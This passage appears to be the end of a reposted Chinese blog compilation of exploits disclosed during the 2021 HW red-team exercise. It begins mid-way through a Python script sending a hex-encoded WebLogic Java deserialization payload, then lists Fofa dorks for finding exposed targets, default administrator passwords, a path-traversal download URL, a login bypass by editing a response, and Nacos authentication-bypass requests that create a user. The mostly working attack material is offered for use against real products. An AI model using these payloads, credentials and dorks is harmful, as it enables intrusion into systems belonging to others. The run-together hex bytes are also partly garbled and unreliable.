x53x65x72x69x61x6cx69x7ax61x62x6cx65x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx78x70x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx78x70x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x74x00x08x66x35x61x35x61x36x30x38x71x00x7ex00x05x78x76x71x00x7ex00x03x78' payload='x00x00x09xf3x01x65x01xffxffxffxffxffxffxffxffx00x00x00x71x00x00xeax60x00x00x00x18x43x2exc6xa2xa6x39x85xb5xafx7dx63xe6x43x83xf4x2ax6dx92xc9xe9xafx0fx94x72x02x79x73x72x00x78x72x01x78x72x02x78x70x00x00x00x0cx00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x01x00x70x70x70x70x70x70x00x00x00x0cx00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x01x00x70x06xfex01x00x00xacxedx00x05x73x72x00x1dx77x65x62x6cx6fx67x69x63x2ex72x6ax76x6dx2ex43x6cx61x73x73x54x61x62x6cx65x45x6ex74x72x79x2fx52x65x81x57xf4xf9xedx0cx00x00x78x70x72x00x24x77x65x62x6cx6fx67x69x63x2ex63x6fx6dx6dx6fx6ex2ex69x6ex74x65x72x6ex61x6cx2ex50x61x63x6bx61x67x65x49x6ex66x6fxe6xf7x23xe7xb8xaex1exc9x02x00x09x49x00x05x6dx61x6ax6fx72x49x00x05x6dx69x6ex6fx72x49x00x0bx70x61x74x63x68x55x70x64x61x74x65x49x00x0cx72x6fx6cx6cx69x6ex67x50x61x74x63x68x49x00x0bx73x65x72x76x69x63x65x50x61x63x6bx5ax00x0ex74x65x6dx70x6fx72x61x72x79x50x61x74x63x68x4cx00x09x69x6dx70x6cx54x69x74x6cx65x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x0ax69x6dx70x6cx56x65x6ex64x6fx72x71x00x7ex00x03x4cx00x0bx69x6dx70x6cx56x65x72x73x69x6fx6ex71x00x7ex00x03x78x70x77x02x00x00x78xfex01x00x00'payload=payload+payloadObjpayload=payload+'xfex01x00x00xacxedx00x05x73x72x00x1dx77x65x62x6cx6fx67x69x63x2ex72x6ax76x6dx2ex43x6cx61x73x73x54x61x62x6cx65x45x6ex74x72x79x2fx52x65x81x57xf4xf9xedx0cx00x00x78x70x72x00x21x77x65x62x6cx6fx67x69x63x2ex63x6fx6dx6dx6fx6ex2ex69x6ex74x65x72x6ex61x6cx2ex50x65x65x72x49x6ex66x6fx58x54x74xf3x9bxc9x08xf1x02x00x07x49x00x05x6dx61x6ax6fx72x49x00x05x6dx69x6ex6fx72x49x00x0bx70x61x74x63x68x55x70x64x61x74x65x49x00x0cx72x6fx6cx6cx69x6ex67x50x61x74x63x68x49x00x0bx73x65x72x76x69x63x65x50x61x63x6bx5ax00x0ex74x65x6dx70x6fx72x61x72x79x50x61x74x63x68x5bx00x08x70x61x63x6bx61x67x65x73x74x00x27x5bx4cx77x65x62x6cx6fx67x69x63x2fx63x6fx6dx6dx6fx6ex2fx69x6ex74x65x72x6ex61x6cx2fx50x61x63x6bx61x67x65x49x6ex66x6fx3bx78x72x00x24x77x65x62x6cx6fx67x69x63x2ex63x6fx6dx6dx6fx6ex2ex69x6ex74x65x72x6ex61x6cx2ex56x65x72x73x69x6fx6ex49x6ex66x6fx97x22x45x51x64x52x46x3ex02x00x03x5bx00x08x70x61x63x6bx61x67x65x73x71x00x7ex00x03x4cx00x0ex72x65x6cx65x61x73x65x56x65x72x73x69x6fx6ex74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx5bx00x12x76x65x72x73x69x6fx6ex49x6ex66x6fx41x73x42x79x74x65x73x74x00x02x5bx42x78x72x00x24x77x65x62x6cx6fx67x69x63x2ex63x6fx6dx6dx6fx6ex2ex69x6ex74x65x72x6ex61x6cx2ex50x61x63x6bx61x67x65x49x6ex66x6fxe6xf7x23xe7xb8xaex1exc9x02x00x09x49x00x05x6dx61x6ax6fx72x49x00x05x6dx69x6ex6fx72x49x00x0bx70x61x74x63x68x55x70x64x61x74x65x49x00x0cx72x6fx6cx6cx69x6ex67x50x61x74x63x68x49x00x0bx73x65x72x76x69x63x65x50x61x63x6bx5ax00x0ex74x65x6dx70x6fx72x61x72x79x50x61x74x63x68x4cx00x09x69x6dx70x6cx54x69x74x6cx65x71x00x7ex00x05x4cx00x0ax69x6dx70x6cx56x65x6ex64x6fx72x71x00x7ex00x05x4cx00x0bx69x6dx70x6cx56x65x72x73x69x6fx6ex71x00x7ex00x05x78x70x77x02x00x00x78xfex00xffxfex01x00x00xacxedx00x05x73x72x00x13x77x65x62x6cx6fx67x69x63x2ex72x6ax76x6dx2ex4ax56x4dx49x44xdcx49xc2x3exdex12x1ex2ax0cx00x00x78x70x77x46x21x00x00x00x00x00x00x00x00x00x09x31x32x37x2ex30x2ex31x2ex31x00x0bx75x73x2dx6cx2dx62x72x65x65x6ex73xa5x3cxafxf1x00x00x00x07x00x00x1bx59xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffx00x78xfex01x00x00xacxedx00x05x73x72x00x13x77x65x62x6cx6fx67x69x63x2ex72x6ax76x6dx2ex4ax56x4dx49x44xdcx49xc2x3exdex12x1ex2ax0cx00x00x78x70x77x1dx01x81x40x12x81x34xbfx42x76x00x09x31x32x37x2ex30x2ex31x2ex31xa5x3cxafxf1x00x00x00x00x00x78'
payload=struct.pack('>I',len(payload)) + payload[4:]
print '[+] Sending payload...'sock.send(payload)time.sleep(1)data = sock.recv(1024)print 'received "%s"' % dataprint 'send sucess'

0x38 中新金盾信息安全管理系统存在默认密码


Fofa


title="中新金盾信息安全管理系统"


POC


admin/[email protected]#$


0x39 好视通视频会议平台存在默认口令&&任意文件下载


Fofa


app="好视通-视频会议"


默认密码POC


admin/admin


任意文件下载POC


/register/toDownload.do?fileName=敏感文件路径
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)


0x40 安天追影威胁分析系统越权访问漏洞


漏洞描述
通过修改返回包内容,可以绕过验证,直接登陆系统,可以查看到部分敏感信息
POC
1.访问威胁分析系统,抓包一条"/api/user/islogin"的请求,返回包的内容为


{"role": "", "login_status": false, "result": "ok"}


2.把请求中的 login_status 改为 true
3.再次访问首页成功进入页面


0x41 Create Alibaba Nacos认证绕过


Fofa


fofa:title="Nacos"


POC

POST /nacos/v1/auth/users HTTP/1.1Host: 127.0.0.1User-Agent: Nacos-ServerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
username=aaaa&password=bbbb



GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1Host: 127.0.0.1User-Agent: Nacos-ServerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: close

参考来源


https://www.freebuf.com/articles/268901.html
http://www.hackdig.com/
https://github.com/hhroot/2021_Hvv/tree/8dcfdd7786ded69f404d52a162a8c4dfcbfd34b9#readme

本文出自https://www.cnblogs.com/KHZ521/p/14662410.html

作者:追的上的梦想 

侵权联系删除

原文阅读效果更佳



本文始发于微信公众号(渗透云笔记):2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: